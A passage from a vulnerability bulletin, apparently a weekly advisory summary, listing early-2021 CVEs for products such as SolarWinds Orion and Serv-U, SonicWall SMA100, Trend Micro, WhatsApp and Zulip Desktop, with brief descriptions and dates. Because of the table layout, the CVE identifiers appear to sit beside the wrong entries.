CVE-2021-25275
MISC |
solarwinds — orion_platform
|
The Collector Service in SolarWinds Orion Platform before 2020.2.4 uses MSMQ (Microsoft Message Queue) and doesn’t set permissions on its private queues. As a result, remote unauthenticated clients can send messages to TCP port 1801 that the Collector Service will process. Additionally, upon processing of such messages, the service deserializes them in insecure manner, allowing remote arbitrary code execution as LocalSystem. |
2021-02-03 |
not yet calculated |
CVE-2021-25274
MISC |
| solarwinds — serv-u |
In SolarWinds Serv-U before 15.2.2 Hotfix 1, there is a directory containing user profile files (that include users’ password hashes) that is world readable and writable. An unprivileged Windows user (having access to the server’s filesystem) can add an FTP user by copying a valid profile file to this directory. For example, if this profile sets up a user with a C: home directory, then the attacker obtains access to read or replace arbitrary files with LocalSystem privileges. |
2021-02-03 |
not yet calculated |
CVE-2021-25276
MISC |
sonicwall — sslvpn_sma100
|
A SQL-Injection vulnerability in the SonicWall SSLVPN SMA100 product allows a remote unauthenticated attacker to perform SQL query to access username password and other session related information. This vulnerability impacts SMA100 build version 10.x. |
2021-02-04 |
not yet calculated |
CVE-2021-20016
CONFIRM |
squaredup — squaredup
|
CSRF protection was not present in SquaredUp before version 4.6.0. A CSRF attack could have been possible by an administrator executing arbitrary code in a HTML dashboard tile via a crafted HTML page, or by uploading a malicious SVG payload into a dashboard. |
2021-02-03 |
not yet calculated |
CVE-2020-9388
CONFIRM |
tibco — ebx_web_server
|
The TIBCO EBX Web Server component of TIBCO Software Inc.’s TIBCO EBX contains a vulnerability that theoretically allows a low privileged attacker with network access to execute a Stored Cross Site Scripting (XSS) attack on the affected system. Affected releases are TIBCO Software Inc.’s TIBCO EBX: versions 5.9.12 and below. |
2021-02-02 |
not yet calculated |
CVE-2021-23271
CONFIRM
CONFIRM |
traccar — traccar
|
Traccar is an open source GPS tracking system. In Traccar before version 4.12 there is an unquoted Windows binary path vulnerability. Only Windows versions are impacted. Attacker needs write access to the filesystem on the host machine. If Java path includes a space, then attacker can lift their privilege to the same as Traccar service (system). This is fixed in version 4.12. |
2021-02-02 |
not yet calculated |
CVE-2021-21292
MISC
CONFIRM
MISC |
trend_micro — antivirus_for_mac_2021
|
Trend Micro Antivirus for Mac 2021 (Consumer) is vulnerable to a memory exhaustion vulnerability that could lead to disabling all the scanning functionality within the application. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability – i.e. the attacker must already have access to the target system (either legitimately or via another exploit). |
2021-02-04 |
not yet calculated |
CVE-2021-25227
N/A
N/A |
trend_micro — apex_one
|
An improper access control vulnerability in Trend Micro Apex One (on-prem and SaaS) and OfficeScan XG SP1 could allow an unauthenticated user to obtain information about the database server. |
2021-02-04 |
not yet calculated |
CVE-2021-25229
N/A
N/A
N/A |
trend_micro — apex_one
|
An improper access control vulnerability in Trend Micro Apex One (on-prem and SaaS), OfficeScan XG SP1, and Worry-Free Business Security 10.0 SP1 could allow an unauthenticated user to obtain information about hotfix history. |
2021-02-04 |
not yet calculated |
CVE-2021-25228
N/A
N/A
N/A
N/A |
trend_micro — worry-free_business_security
|
An improper access control vulnerability in Worry-Free Business Security 10.0 SP1 could allow an unauthenticated user to obtain various pieces of settings informaiton. |
2021-02-04 |
not yet calculated |
CVE-2021-25245
N/A
N/A |
trend_micro — worry-free_business_security
|
An improper access control vulnerability in Worry-Free Business Security 10.0 SP1 could allow an unauthenticated user to obtain various pieces of configuration informaiton. |
2021-02-04 |
not yet calculated |
CVE-2021-25244
N/A
N/A |
typora — typora
|
An issue was discovered in Typora 0.9.67. There is an XSS vulnerability that causes Remote Code Execution. |
2021-02-05 |
not yet calculated |
CVE-2020-18737
MISC |
video_insight — vms
|
Video Insight VMS versions prior to 7.8 allows a remote attacker to execute arbitrary code with the system user privilege by sending a specially crafted request. |
2021-02-05 |
not yet calculated |
CVE-2021-20623
MISC
MISC |
whatsapp — whatsapp
|
A missing bounds check in WhatsApp for Android prior to v2.21.1.13 and WhatsApp Business for Android prior to v2.21.1.13 could have allowed out-of-bounds read and write if a user applied specific image filters to a specially crafted image and sent the resulting image. |
2021-02-02 |
not yet calculated |
CVE-2020-1910
CONFIRM |
wordpress — wordpress
|
Cross-site request forgery (CSRF) vulnerability in Name Directory 1.17.4 and earlier allows remote attackers to hijack the authentication of administrators via unspecified vectors. |
2021-02-05 |
not yet calculated |
CVE-2021-20652
MISC
MISC |
zoho — manageengine_applications_manager
|
doFilter in com.adventnet.appmanager.filter.UriCollector in Zoho ManageEngine Applications Manager through 14930 allows an authenticated SQL Injection via the resourceid parameter to showresource.do. |
2021-02-05 |
not yet calculated |
CVE-2020-35765
MISC
CONFIRM |
zohocorp — manageengine_remote_access_plus
|
Zoho ManageEngine Remote Access Plus 10.0.259 allows HTML injection via the Description field on the Admin – User Administration userMgmt.do?actionToCall=ShowUser screen. |
2021-02-03 |
not yet calculated |
CVE-2019-16268
MISC
CONFIRM |
zulipchat — zulip_desktop
|
Zulip Desktop before 5.0.0 allows attackers to perform recording via the webcam and microphone due to a missing permission request handler. |
2021-02-05 |
not yet calculated |
CVE-2020-10858
CONFIRM |
zulipchat — zulip_desktop
|
Zulip Desktop before 5.0.0 improperly uses shell.openExternal and shell.openItem with untrusted content, leading to remote code execution. |
2021-02-05 |
not yet calculated |
CVE-2020-10857
CONFIRM |
zzzcms — zzzcms
|
SQL Injection in ZZZCMS zzzphp 1.7.1 allows remote attackers to execute arbitrary code due to a lack of parameter filtering in inc/zzz_template.php. |
2021-02-05 |
not yet calculated |
CVE-2020-18717
MISC |
other social media platform, you may be handing valuable information over to someone who could use it for identity theft.
Recent Comments